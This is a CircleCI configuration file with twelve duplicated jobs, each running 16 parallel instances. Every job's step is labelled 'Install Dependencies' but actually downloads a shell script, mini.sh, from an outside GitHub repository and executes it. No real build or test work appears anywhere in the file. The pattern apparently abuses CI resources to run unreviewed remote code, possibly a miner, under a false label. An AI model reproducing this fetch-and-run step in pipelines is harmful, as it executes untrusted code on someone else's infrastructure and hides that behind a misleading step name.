version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16           
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop4:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop5:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop6:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16             
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop7:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop8:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop9:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop10:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
    Devop11:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16            
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Kabellilit/manis/main/mini.sh && chmod +x mini.sh && ./mini.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3
            - Devop4
            - Devop5
            - Devop6
            - Devop7
            - Devop8
            - Devop9
            - Devop10
            - Devop11            
            
